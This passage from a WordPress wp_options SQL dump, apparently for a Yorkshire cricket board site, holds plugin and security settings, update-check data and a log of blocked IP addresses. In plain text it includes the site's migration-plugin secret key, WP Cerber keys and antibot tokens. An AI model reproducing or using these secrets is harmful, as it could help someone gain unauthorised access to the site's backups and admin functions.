1;}','yes'),(61537,'widget_media_video','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(61538,'widget_custom_html','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(61546,'active_plugins1','a:15:{i:0;s:51:\"all-in-one-wp-migration/all-in-one-wp-migration.php\";i:1;s:51:\"all-in-one-wp-security-and-firewall/wp-security.php\";i:2;s:38:\"contact-form-7-designer/cf7-styles.php\";i:3;s:33:\"contact-form-7-modules/hidden.php\";i:4;s:42:\"contact-form-7-modules/send-all-fields.php\";i:5;s:36:\"contact-form-7/wp-contact-form-7.php\";i:6;s:27:\"dw-megamenu/dw-megamenu.php\";i:7;s:35:\"dw-social-share/dw-social-share.php\";i:8;s:9:\"hello.php\";i:9;s:32:\"login-lockdown/loginlockdown.php\";i:10;s:29:\"spam-captcha/spam-captcha.php\";i:11;s:57:\"universal-google-analytics/universal-google-analytics.php\";i:12;s:17:\"unyson/unyson.php\";i:13;s:24:\"wordpress-seo/wp-seo.php\";i:14;s:35:\"wp-date-remover/wp-date-remover.php\";}','yes'),(61547,'ai1wm_secret_key','LqgOP9nVffpY','yes'),(61548,'ai1wm_backups_labels','a:0:{}','yes'),(61549,'ai1wm_sites_links','a:0:{}','yes'),(61550,'ai1wm_status','a:3:{s:4:\"type\";s:4:\"done\";s:5:\"title\";s:41:\"Your site has been imported successfully!\";s:7:\"message\";s:389:\"» <a class=\"ai1wm-no-underline\" href=\"https://yorkshirecricketboard.org.uk/wp-admin/options-permalink.php#submit\" target=\"_blank\">Save permalinks structure</a>. (opens a new window)<br />» <a class=\"ai1wm-no-underline\" href=\"https://wordpress.org/support/view/plugin-reviews/all-in-one-wp-migration?rate=5#postform\" target=\"_blank\">Optionally, review the plugin</a>. (opens a new window)\";}','yes'),(61552,'template','the-minimal','yes'),(61553,'stylesheet','the-minimal','yes'),(61554,'swift_performance_plugin_organizer','a:0:{}','yes'),(61555,'jetpack_active_modules','a:0:{}','yes'),(61557,'recovery_keys','a:0:{}','yes'),(61568,'ai1wm_updater','a:0:{}','yes'),(61595,'_transient_health-check-site-status-result','{\"good\":13,\"recommended\":5,\"critical\":1}','yes'),(61663,'wpseo_sitemap_wp_cache_validator','6bpC6','no'),(61833,'finished_updating_comment_type','1','yes'),(63309,'wp_page_for_privacy_policy','0','yes'),(63310,'show_comments_cookies_opt_in','1','yes'),(63311,'admin_email_lifespan','0','yes'),(63312,'disallowed_keys','','no'),(63313,'comment_previously_approved','','yes'),(63314,'auto_plugin_theme_update_emails','a:0:{}','no'),(63315,'auto_update_core_dev','enabled','yes'),(63316,'auto_update_core_minor','enabled','yes'),(63317,'auto_update_core_major','unset','yes'),(65850,'wordfence_ls_version','1.0.6','yes'),(65851,'wfls_last_role_change','1624361241','no'),(65852,'wordfence_version','7.5.4','yes'),(65853,'wordfence_case','1','yes'),(65854,'wordfence_installed','1','yes'),(65856,'wordfenceActivated','1','yes'),(65857,'active_plugins','a:3:{i:0;s:51:\"all-in-one-wp-security-and-firewall/wp-security.php\";i:1;s:23:\"wordfence/wordfence.php\";i:2;s:23:\"wp-cerber/wp-cerber.php\";}','yes'),(65858,'wf_plugin_act_error','','yes'),(66108,'wordfence_syncAttackDataAttempts','0','no'),(66109,'wordfence_syncingAttackData','0','no'),(66111,'wordfence_lastSyncAttackData','1630538666','no'),(67320,'_cerber_db_errors','a:10:{i:0;a:3:{i:0;s:63:\"Table \'yorkshirecricketboardorguk.wp_cerber_sets\' doesn\'t exist\";i:1;s:73:\"SELECT * FROM wp_cerber_sets WHERE the_key = \"_nexus_mode\" AND the_id = 0\";i:2;d:1624623690.296409;}i:1;a:3:{i:0;s:63:\"Table \'yorkshirecricketboardorguk.wp_cerber_sets\' doesn\'t exist\";i:1;s:74:\"SELECT * FROM wp_cerber_sets WHERE the_key = \"admin_notice\" AND the_id = 0\";i:2;d:1624623690.307764;}i:2;a:3:{i:0;s:63:\"Table \'yorkshirecricketboardorguk.wp_cerber_sets\' doesn\'t exist\";i:1;s:101:\"INSERT INTO wp_cerber_sets (the_key, the_id, the_value, expires) VALUES (\"admin_notice\",0,\"a:0:{}\",0)\";i:2;d:1624623690.30788;}i:3;a:3:{i:0;s:63:\"Table \'yorkshirecricketboardorguk.wp_cerber_sets\' doesn\'t exist\";i:1;s:75:\"SELECT * FROM wp_cerber_sets WHERE the_key = \"admin_message\" AND the_id = 0\";i:2;d:1624623690.307988;}i:4;a:3:{i:0;s:63:\"Table \'yorkshirecricketboardorguk.wp_cerber_sets\' doesn\'t exist\";i:1;s:102:\"INSERT INTO wp_cerber_sets (the_key, the_id, the_value, expires) VALUES (\"admin_message\",0,\"a:0:{}\",0)\";i:2;d:1624623690.308093;}i:5;a:3:{i:0;s:63:\"Table \'yorkshirecricketboardorguk.wp_cerber_sets\' doesn\'t exist\";i:1;s:79:\"SELECT * FROM wp_cerber_sets WHERE the_key = \"cerber_admin_wide\" AND the_id = 0\";i:2;d:1624623690.308199;}i:6;a:3:{i:0;s:63:\"Table \'yorkshirecricketboardorguk.wp_cerber_sets\' doesn\'t exist\";i:1;s:100:\"INSERT INTO wp_cerber_sets (the_key, the_id, the_value, expires) VALUES (\"cerber_admin_wide\",0,\"\",0)\";i:2;d:1624623690.308233;}i:7;a:3:{i:0;s:45:\"Duplicate entry \'119.29.155.166\' for key \'ip\'\";i:1;s:147:\"INSERT INTO cerber_blocks (ip,block_until,reason,reason_id) VALUES (\"119.29.155.166\",1626566508,\"Multiple suspicious activities were detected\",707)\";i:2;d:1626562908.527066;}i:8;a:3:{i:0;s:44:\"Duplicate entry \'50.62.177.160\' for key \'ip\'\";i:1;s:146:\"INSERT INTO cerber_blocks (ip,block_until,reason,reason_id) VALUES (\"50.62.177.160\",1646996407,\"Multiple suspicious activities were detected\",707)\";i:2;d:1646992807.153104;}i:9;a:3:{i:0;s:43:\"Duplicate entry \'20.7.131.233\' for key \'ip\'\";i:1;s:135:\"INSERT INTO cerber_blocks (ip,block_until,reason,reason_id) VALUES (\"20.7.131.233\",1667958173,\"Limit on login attempts is reached\",701)\";i:2;d:1667954573.387861;}}','no'),(67335,'_cerber_up','a:2:{s:1:\"v\";s:5:\"8.8.5\";s:1:\"t\";i:1624623692;}','no'),(67336,'cerber_admin_info','<h1>Highlights from WP Cerber Security 8.8.5</h1><ul><li>New: Quick user activity analytics (user insights) with filtering links on the Activity and Live Traffic log pages. Select a user to see how it works.</li><li>New: Quick IP address activity and analytics (IP insights) with filtering links on the Activity and Live Traffic log pages. Select an IP address to see how it works.</li><li>Improved: The selected user profile is displayed when filtering log entries by the user login or using the username search on the Activity log page.</li><li>Improved: The IP address details and analytics are displayed when filtering log entries by the IP address or using the IP address search on the Activity log page.</li><li>Improved: Implemented AJAX rendering of the plugin admin pages for faster loading and more convenient navigation through WP Cerber’s admin pages</li><li>Improved: To load the Users admin page faster, the user table columns generated by WP Cerber are now loaded via AJAX.</li><li>Improved: Highlighting the selected filtering link in the navigation bar on the Activity and Live Traffic log pages.</li></ul><p style=\"margin-top: 18px; line-height: 1.3;\"><span class=\"dashicons-before dashicons-info-outline\"></span>  &nbsp; <a href=\"https://wpcerber.com/?plugin_version=8.8.5\" target=\"_blank\">Read more on wpcerber.com</a></p>  <h2 style=\"margin-top: 28px;\">We need your support to keep moving forward</h2>\r\n                    <table style=\"margin-top: 20px;\"><tr><td></td><td style=\"padding-top: 0;\">By sharing your unique opinion on WP Cerber, you help the engineers behind the plugin make greater progress and help other professionals find the right software. You can leave your review on one of the following websites. Feel free to use your native language. Thanks!\r\n                    </td></tr></table>\r\n                       \r\n                    <p><a href=\"https://www.trustpilot.com/evaluate/wpcerber.com\" target=\"_blank\">Leave review on Trustpilot</a>\r\n                    &nbsp;|&nbsp; \r\n                    <a href=\"https://www.g2.com/products/cerber-security-antispam-malware-scan/reviews/start\" target=\"_blank\">Leave review on G2.COM</a><p style=\"text-align:right; padding-right: 20px;\">\r\n    		    <input type=\"button\" class=\"button button-primary cerber-dismiss\" value=\" &nbsp; Awesome! &nbsp; \"/></p>','no'),(67337,'cerber-groove','2E3aGS8l1HbpeKmi','no'),(67338,'cerber-groove-x','a:2:{i:0;s:27:\"8aqRv0MFXWrJ5UknZSimtOK7VIp\";i:1;s:28:\"V43gN1r7fCIMsTdmkEiqz9Ux2DAL\";}','no'),(67339,'cerber-main','a:38:{s:9:\"boot-mode\";i:0;s:8:\"attempts\";i:5;s:6:\"period\";i:30;s:7:\"lockout\";i:60;s:8:\"agperiod\";i:24;s:7:\"aglocks\";i:2;s:6:\"aglast\";i:4;s:10:\"limitwhite\";i:0;s:11:\"nologinhint\";i:0;s:15:\"nologinhint_msg\";s:0:\"\";s:10:\"nopasshint\";i:0;s:14:\"nopasshint_msg\";s:0:\"\";s:5:\"proxy\";i:0;s:10:\"cookiepref\";s:0:\"\";s:6:\"subnet\";i:0;s:8:\"nonusers\";i:0;s:7:\"wplogin\";i:0;s:10:\"noredirect\";i:0;s:7:\"page404\";i:1;s:9:\"loginpath\";s:0:\"\";s:9:\"loginnowp\";i:0;s:13:\"logindeferred\";i:0;s:10:\"citadel_on\";s:1:\"1\";s:7:\"cilimit\";i:200;s:8:\"ciperiod\";i:15;s:10:\"ciduration\";i:60;s:8:\"cinotify\";i:1;s:7:\"keeplog\";i:30;s:12:\"keeplog_auth\";i:30;s:8:\"ip_extra\";i:1;s:9:\"cerberlab\";i:0;s:11:\"cerberproto\";i:0;s:7:\"usefile\";i:0;s:10:\"dateformat\";s:0:\"\";s:10:\"plain_date\";i:0;s:10:\"admin_lang\";i:0;s:14:\"top_admin_menu\";i:0;s:14:\"no_white_my_ip\";i:0;}','no'),(67340,'cerber-hardening','a:14:{s:8:\"stopenum\";i:1;s:15:\"stopenum_oembed\";i:1;s:16:\"stopenum_sitemap\";i:0;s:8:\"adminphp\";i:0;s:8:\"phpnoupl\";i:0;s:8:\"nophperr\";i:1;s:6:\"xmlrpc\";i:0;s:7:\"nofeeds\";i:0;s:10:\"norestuser\";i:1;s:6:\"norest\";i:0;s:8:\"restauth\";i:1;s:9:\"restroles\";a:1:{i:0;s:13:\"administrator\";}s:9:\"restwhite\";a:2:{i:0;s:6:\"oembed\";i:1;s:14:\"wp-site-health\";}s:9:\"cleanhead\";i:1;}','no'),(67341,'cerber-users','a:19:{s:8:\"authonly\";i:0;s:11:\"authonlyacl\";i:0;s:11:\"authonlymsg\";s:68:\"Only registered and logged in users are allowed to view this website\";s:13:\"authonlyredir\";s:0:\"\";s:8:\"regwhite\";i:0;s:12:\"regwhite_msg\";s:0:\"\";s:12:\"reglimit_num\";i:3;s:12:\"reglimit_min\";i:60;s:6:\"emrule\";i:0;s:6:\"emlist\";a:0:{}s:10:\"prohibited\";a:0:{}s:7:\"app_pwd\";i:1;s:11:\"auth_expire\";s:0:\"\";s:8:\"usersort\";s:0:\"\";s:11:\"pdata_erase\";i:0;s:14:\"pdata_sessions\";i:0;s:12:\"pdata_export\";i:0;s:9:\"pdata_act\";i:0;s:9:\"pdata_trf\";a:0:{}}','no'),(67342,'cerber-antispam','a:10:{s:8:\"botscomm\";i:1;s:7:\"botsreg\";i:0;s:7:\"botsany\";i:0;s:8:\"botssafe\";i:0;s:10:\"botsnoauth\";i:1;s:10:\"customcomm\";i:0;s:9:\"botswhite\";s:0:\"\";s:8:\"spamcomm\";i:0;s:10:\"trashafter\";i:7;s:18:\"trashafter-enabled\";i:0;}','no'),(67343,'cerber-recaptcha','a:14:{s:7:\"sitekey\";s:0:\"\";s:9:\"secretkey\";s:0:\"\";s:9:\"invirecap\";i:0;s:10:\"recaplogin\";i:0;s:9:\"recaplost\";i:0;s:8:\"recapreg\";i:0;s:13:\"recapwoologin\";i:0;s:12:\"recapwoolost\";i:0;s:11:\"recapwooreg\";i:0;s:8:\"recapcom\";i:0;s:12:\"recapcomauth\";i:0;s:16:\"recaptcha-period\";i:60;s:16:\"recaptcha-number\";i:3;s:16:\"recaptcha-within\";i:30;}','no'),(67344,'cerber-notifications','a:11:{s:6:\"notify\";i:1;s:5:\"above\";i:3;s:5:\"email\";s:0:\"\";s:9:\"emailrate\";i:12;s:14:\"notify-new-ver\";s:1:\"1\";s:7:\"pbtoken\";s:0:\"\";s:8:\"pbdevice\";s:0:\"\";s:12:\"wreports-day\";s:1:\"1\";s:13:\"wreports-time\";i:9;s:12:\"email-report\";s:0:\"\";s:13:\"enable-report\";s:1:\"1\";}','no'),(67345,'cerber-traffic','a:22:{s:9:\"tienabled\";s:1:\"1\";s:9:\"tiipwhite\";i:0;s:7:\"tiwhite\";s:0:\"\";s:8:\"tierrmon\";s:1:\"1\";s:11:\"tierrnoauth\";i:1;s:6:\"timode\";s:1:\"3\";s:12:\"tilogrestapi\";i:0;s:11:\"tilogxmlrpc\";i:0;s:9:\"tinocrabs\";s:1:\"1\";s:8:\"tinolocs\";a:0:{}s:6:\"tinoua\";a:0:{}s:8:\"tifields\";i:0;s:6:\"timask\";s:0:\"\";s:6:\"tihdrs\";i:0;s:11:\"tihdrs_sent\";i:0;s:6:\"tisenv\";i:0;s:7:\"ticandy\";i:0;s:12:\"ticandy_sent\";i:0;s:8:\"tiphperr\";i:0;s:11:\"tithreshold\";s:0:\"\";s:9:\"tikeeprec\";i:30;s:14:\"tikeeprec_auth\";i:30;}','no'),(67346,'cerber-user_shield','a:9:{s:7:\"ds_4acc\";i:0;s:13:\"ds_regs_roles\";a:0:{}s:10:\"ds_add_acc\";a:1:{i:0;s:13:\"administrator\";}s:11:\"ds_edit_acc\";a:1:{i:0;s:13:\"administrator\";}s:11:\"ds_4acc_acl\";i:0;s:9:\"ds_4roles\";i:0;s:11:\"ds_add_role\";a:1:{i:0;s:13:\"administrator\";}s:12:\"ds_edit_role\";a:1:{i:0;s:13:\"administrator\";}s:13:\"ds_4roles_acl\";i:0;}','no'),(67347,'cerber-opt_shield','a:4:{s:8:\"ds_4opts\";i:0;s:14:\"ds_4opts_roles\";a:1:{i:0;s:13:\"administrator\";}s:13:\"ds_4opts_list\";a:7:{s:11:\"admin_email\";i:1;s:12:\"default_role\";i:1;s:4:\"home\";i:1;s:7:\"siteurl\";i:1;s:18:\"users_can_register\";i:1;s:14:\"active_plugins\";i:1;s:8:\"template\";i:1;}s:12:\"ds_4opts_acl\";i:0;}','no'),(67348,'cerber-scanner','a:10:{s:8:\"scan_cpt\";a:0:{}s:9:\"scan_uext\";a:0:{}s:12:\"scan_exclude\";a:0:{}s:9:\"scan_inew\";s:1:\"1\";s:9:\"scan_imod\";s:1:\"1\";s:10:\"scan_chmod\";i:0;s:8:\"scan_tmp\";i:0;s:9:\"scan_sess\";i:0;s:10:\"scan_debug\";i:0;s:13:\"scan_qcleanup\";s:2:\"30\";}','no'),(67349,'cerber-schedule','a:8:{s:11:\"scan_aquick\";i:0;s:10:\"scan_afull\";s:5:\"02:00\";s:18:\"scan_afull-enabled\";i:0;s:10:\"scan_reinc\";a:5:{i:3;i:1;i:4;i:1;i:15;i:1;i:50;i:1;i:51;i:1;}s:12:\"scan_relimit\";i:3;s:10:\"scan_isize\";i:0;s:12:\"scan_ierrors\";i:0;s:10:\"email-scan\";s:0:\"\";}','no'),(67350,'cerber-policies','a:9:{s:13:\"scan_delunatt\";i:0;s:11:\"scan_delupl\";a:0:{}s:14:\"scan_delunwant\";i:0;s:15:\"scan_recover_wp\";i:0;s:15:\"scan_recover_pl\";i:0;s:14:\"scan_nodeltemp\";i:0;s:14:\"scan_nodelsess\";i:0;s:13:\"scan_delexdir\";a:0:{}s:13:\"scan_delexext\";a:0:{}}','no'),(67351,'cerber-nexus_master','a:7:{s:13:\"master_tolist\";i:1;s:13:\"master_swshow\";i:1;s:14:\"master_at_site\";i:1;s:13:\"master_locale\";i:0;s:9:\"master_dt\";i:0;s:9:\"master_tz\";i:0;s:11:\"master_diag\";i:0;}','no'),(67352,'cerber-nexus-slave','a:3:{s:9:\"slave_ips\";s:0:\"\";s:12:\"slave_access\";i:2;s:10:\"slave_diag\";i:0;}','no'),(67353,'cerber-antibot','a:2:{i:0;a:2:{i:0;a:2:{i:0;s:10:\"ctUmoGjEln\";i:1;s:13:\"I1CTrlhUxJ]Rv\";}i:1;a:2:{i:0;s:15:\"KNLRAVxQEcGFvdT\";i:1;s:7:\"pWfbriv\";}}i:1;a:3:{i:0;a:2:{i:0;s:11:\"C-tNawvOnrk\";i:1;s:15:\"u6n8va5C93ljoiy\";}i:1;a:2:{i:0;s:6:\"ate-DK\";i:1;s:12:\"1HS26*F3vUgV\";}i:2;a:2:{i:0;s:11:\"hmxKuBUtRyC\";i:1;s:6:\"*5SaO8\";}}}','no'),(67361,'widget_block','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(67376,'_cerber_notify_new','a:4:{i:0;s:5:\"8.9.3\";i:1;s:5:\"8.9.5\";i:2;s:5:\"8.9.6\";i:3;s:3:\"9.0\";}','no'),(67379,'https_detection_errors','a:0:{}','yes'),(67778,'_cerber_report','a:2:{i:0;i:1675069800;i:1;b:0;}','no'),(92356,'wp_force_deactivated_plugins','a:0:{}','yes'),(92357,'_transient_is_multi_author','0','yes'),(92367,'_transient_the_minimal_categories','2','yes'),(126722,'_site_transient_update_core','O:8:\"stdClass\":4:{s:7:\"updates\";a:4:{i:0;O:8:\"stdClass\":10:{s:8:\"response\";s:7:\"upgrade\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-6.1.1.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-6.1.1.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-6.1.1-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-6.1.1-new-bundled.zip\";s:7:\"partial\";s:0:\"\";s:8:\"rollback\";s:0:\"\";}s:7:\"current\";s:5:\"6.1.1\";s:7:\"version\";s:5:\"6.1.1\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"6.1\";s:15:\"partial_version\";s:0:\"\";}i:1;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-6.1.1.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-6.1.1.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-6.1.1-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-6.1.1-new-bundled.zip\";s:7:\"partial\";s:0:\"\";s:8:\"rollback\";s:0:\"\";}s:7:\"current\";s:5:\"6.1.1\";s:7:\"version\";s:5:\"6.1.1\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"6.1\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}i:2;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:57:\"https://downloads.wordpress.org/release/wordpress-6.1.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:57:\"https://downloads.wordpress.org/release/wordpress-6.1.zip\";s:10:\"no_content\";s:68:\"https://downloads.wordpress.org/release/wordpress-6.1-no-content.zip\";s:11:\"new_bundled\";s:69:\"https://downloads.wordpress.org/release/wordpress-6.1-new-bundled.zip\";s:7:\"partial\";s:0:\"\";s:8:\"rollback\";s:0:\"\";}s:7:\"current\";s:3:\"6.1\";s:7:\"version\";s:3:\"6.1\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"6.1\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}i:3;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-6.0.3.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-6.0.3.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-6.0.3-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-6.0.3-new-bundled.zip\";s:7:\"partial\";s:0:\"\";s:8:\"rollback\";s:0:\"\";}s:7:\"current\";s:5:\"6.0.3\";s:7:\"version\";s:5:\"6.0.3\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"6.1\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}}s:12:\"last_checked\";i:1675179091;s:15:\"version_checked\";s:5:\"5.9.5\";s:12:\"translations\";a:0:{}}','no'),(137320,'_site_transient_timeout_cerber_daily_1','1675305404','no'),(137321,'_site_transient_cerber_daily_1','a:2:{i:0;i:1675132595;i:1;i:1675132604;}','no'),(140311,'_site_transient_timeout_cerber_hourly_1','1675215529','no'),(140312,'_site_transient_cerber_hourly_1','a:2:{i:0;i:1675208329;i:1;i:1675208329;}','no'),(140313,'_site_transient_timeout_cerber_hourly_2','1675215529','no'),(140314,'_site_transient_cerber_hourly_2','a:2:{i:0;i:1675208329;i:1;i:1675208329;}','no'),(140560,'_site_transient_update_themes','O:8:\"stdClass\":5:{s:12:\"last_checked\";i:1675179092;s:7:\"checked\";a:28:{s:10:\"accelerate\";s:5:\"1.2.6\";s:11:\"alpha-store\";s:5:\"1.2.7\";s:8:\"aqueduct\";s:5:\"2.0.2\";s:8:\"barletta\";s:5:\"1.1.1\";s:14:\"clean-magazine\";s:5:\"1.5.1\";s:14:\"fabulous-fluid\";s:3:\"1.2\";s:6:\"fluida\";s:5:\"1.2.4\";s:6:\"hueman\";s:6:\"3.2.10\";s:5:\"illdy\";s:6:\"1.0.35\";s:7:\"lightly\";s:4:\"1.26\";s:16:\"mh-magazine-lite\";s:5:\"2.5.5\";s:6:\"morfeu\";s:5:\"1.1.3\";s:7:\"nirvana\";s:5:\"1.3.2\";s:9:\"panoramic\";s:6:\"1.0.19\";s:5:\"point\";s:5:\"2.0.3\";s:13:\"precious-lite\";s:5:\"1.2.6\";s:5:\"relia\";s:5:\"1.0.7\";s:9:\"sg-window\";s:5:\"1.2.1\";s:21:\"skt-construction-lite\";s:3:\"1.5\";s:6:\"square\";s:5:\"1.3.2\";s:9:\"supernews\";s:5:\"1.0.6\";s:11:\"the-minimal\";s:5:\"1.1.2\";s:7:\"tortuga\";s:5:\"1.1.4\";s:9:\"travelify\";s:5:\"3.0.4\";s:15:\"twentytwentytwo\";s:3:\"1.1\";s:4:\"vega\";s:5:\"1.9.5\";s:7:\"verbosa\";s:5:\"0.9.6\";s:12:\"wen-business\";s:5:\"1.4.1\";}s:8:\"response\";a:26:{s:10:\"accelerate\";a:6:{s:5:\"theme\";s:10:\"accelerate\";s:11:\"new_version\";s:5:\"1.5.0\";s:3:\"url\";s:40:\"https://wordpress.org/themes/accelerate/\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/theme/accelerate.1.5.0.zip\";s:8:\"requires\";b:0;s:12:\"requires_php\";s:3:\"5.6\";}s:8:\"aqueduct\";a:6:{s:5:\"theme\";s:8:\"aqueduct\";s:11:\"new_version\";s:5:\"2.0.3\";s:3:\"url\";s:38:\"https://wordpress.org/themes/aqueduct/\";s:7:\"package\";s:56:\"https://downloads.wordpress.org/theme/aqueduct.2.0.3.zip\";s:8:\"requires\";b:0;s:12:\"requires_php\";b:0;}s:8:\"barletta\";a:6:{s:5:\"theme\";s:8:\"barletta\";s:11:\"new_version\";s:5:\"1.1.9\";s:3:\"url\";s:38:\"https://wordpress.org/themes/barletta/\";s:7:\"package\";s:56:\"https://downloads.wordpress.org/theme/barletta.1.1.9.zip\";s:8:\"requires\";s:3:\"4.7\";s:12:\"requires_php\";s:3:\"5.2\";}s:14:\"clean-magazine\";a:6:{s:5:\"theme\";s:14:\"clean-magazine\";s:11:\"new_version\";s:5:\"1.9.1\";s:3:\"url\";s:44:\"https://wordpress.org/themes/clean-magazine/\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/theme/clean-magazine.1.9.1.zip\";s:8:\"requires\";s:3:\"5.6\";s:12:\"requires_php\";s:3:\"5.6\";}s:14:\"fabulous-fluid\";a:6:{s:5:\"theme\";s:14:\"fabulous-fluid\";s:11:\"new_version\";s:5:\"2.1.1\";s:3:\"url\";s:44:\"https://wordpress.org/themes/fabulous-fluid/\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/theme/fabulous-fluid.2.1.1.zip\";s:8:\"requires\";s:3:\"5.6\";s:12:\"requires_php\";s:3:\"5.6\";}s:6:\"fluida\";a:6:{s:5:\"theme\";s:6:\"fluida\";s:11:\"new_version\";s:5:\"1.8.8\";s:3:\"url\";s:36:\"https://wordpress.org/themes/fluida/\";s:7:\"package\";s:54:\"https://downloads.wordpress.org/theme/fluida.1.8.8.zip\";s:8:\"requires\";s:3:\"4.5\";s:12:\"requires_php\";s:3:\"5.6\";}s:6:\"hueman\";a:6:{s:5:\"theme\";s:6:\"hueman\";s:11:\"new_version\";s:6:\"3.7.23\";s:3:\"url\";s:36:\"https://wordpress.org/themes/hueman/\";s:7:\"package\";s:55:\"https://downloads.wordpress.org/theme/hueman.3.7.23.zip\";s:8:\"requires\";b:0;s:12:\"requires_php\";s:3:\"5.3\";}s:5:\"illdy\";a:6:{s:5:\"theme\";s:5:\"illdy\";s:11:\"new_version\";s:5:\"2.1.9\";s:3:\"url\";s:35:\"https://wordpress.org/themes/illdy/\";s:7:\"package\";s:53:\"https://downloads.wordpress.org/theme/illdy.2.1.9.zip\";s:8:\"requires\";b:0;s:12:\"requires_php\";s:3:\"5.6\";}s:7:\"lightly\";a:6:{s:5:\"theme\";s:7:\"lightly\";s:11:\"new_version\";s:4:\"1.29\";s:3:\"url\";s:37:\"https://wordpress.org/themes/lightly/\";s:7:\"package\";s:54:\"https://downloads.wordpress.org/theme/lightly.1.29.zip\";s:8:\"requires\";s:3:\"4.5\";s:12:\"requires_php\";b:0;}s:16:\"mh-magazine-lite\";a:6:{s:5:\"theme\";s:16:\"mh-magazine-lite\";s:11:\"new_version\";s:5:\"2.9.2\";s:3:\"url\";s:46:\"https://wordpress.org/themes/mh-magazine-lite/\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/theme/mh-magazine-lite.2.9.2.zip\";s:8:\"requires\";b:0;s:12:\"requires_php\";s:3:\"5.6\";}s:6:\"morfeu\";a:6:{s:5:\"theme\";s:6:\"morfeu\";s:11:\"new_version\";s:5:\"1.1.4\";s:3:\"url\";s:36:\"https://wordpress.org/themes/morfeu/\";s:7:\"package\";s:54:\"https://downloads.wordpress.org/theme/morfeu.1.1.4.zip\";s:8:\"requires\";s:3:\"4.5\";s:12:\"requires_php\";b:0;}s:7:\"nirvana\";a:6:{s:5:\"theme\";s:7:\"nirvana\";s:11:\"new_version\";s:5:\"1.6.2\";s:3:\"url\";s:37:\"https://wordpress.org/themes/nirvana/\";s:7:\"package\";s:55:\"https://downloads.wordpress.org/theme/nirvana.1.6.2.zip\";s:8:\"requires\";b:0;s:12:\"requires_php\";s:3:\"5.6\";}s:9:\"panoramic\";a:6:{s:5:\"theme\";s:9:\"panoramic\";s:11:\"new_version\";s:6:\"1.1.42\";s:3:\"url\";s:39:\"https://wordpress.org/themes/panoramic/\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/theme/panoramic.1.1.42.zip\";s:8:\"requires\";b:0;s:12:\"requires_php\";s:3:\"5.3\";}s:5:\"point\";a:6:{s:5:\"theme\";s:5:\"point\";s:11:\"new_version\";s:5:\"2.1.1\";s:3:\"url\";s:35:\"https://wordpress.org/themes/point/\";s:7:\"package\";s:53:\"https://downloads.wordpress.org/theme/point.2.1.1.zip\";s:8:\"requires\";b:0;s:12:\"requires_php\";b:0;}s:13:\"precious-lite\";a:6:{s:5:\"theme\";s:13:\"precious-lite\";s:11:\"new_version\";s:5:\"1.3.3\";s:3:\"url\";s:43:\"https://wordpress.org/themes/precious-lite/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/theme/precious-lite.1.3.3.zip\";s:8:\"requires\";s:3:\"5.9\";s:12:\"requires_php\";s:3:\"5.6\";}s:5:\"relia\";a:6:{s:5:\"theme\";s:5:\"relia\";s:11:\"new_version\";s:5:\"1.2.0\";s:3:\"url\";s:35:\"https://wordpress.org/themes/relia/\";s:7:\"package\";s:53:\"https://downloads.wordpress.org/theme/relia.1.2.0.zip\";s:8:\"requires\";s:3:\"4.6\";s:12:\"requires_php\";b:0;}s:9:\"sg-window\";a:6:{s:5:\"theme\";s:9:\"sg-window\";s:11:\"new_version\";s:5:\"1.2.3\";s:3:\"url\";s:39:\"https://wordpress.org/themes/sg-window/\";s:7:\"package\";s:57:\"https://downloads.wordpress.org/theme/sg-window.1.2.3.zip\";s:8:\"requires\";b:0;s:12:\"requires_php\";b:0;}s:6:\"square\";a:6:{s:5:\"theme\";s:6:\"square\";s:11:\"new_version\";s:6:\"2.0.19\";s:3:\"url\";s:36:\"https://wordpress.org/themes/square/\";s:7:\"package\";s:55:\"https://downloads.wordpress.org/theme/square.2.0.19.zip\";s:8:\"requires\";b:0;s:12:\"requires_php\";s:3:\"5.6\";}s:9:\"supernews\";a:6:{s:5:\"theme\";s:9:\"supernews\";s:11:\"new_version\";s:5:\"3.0.5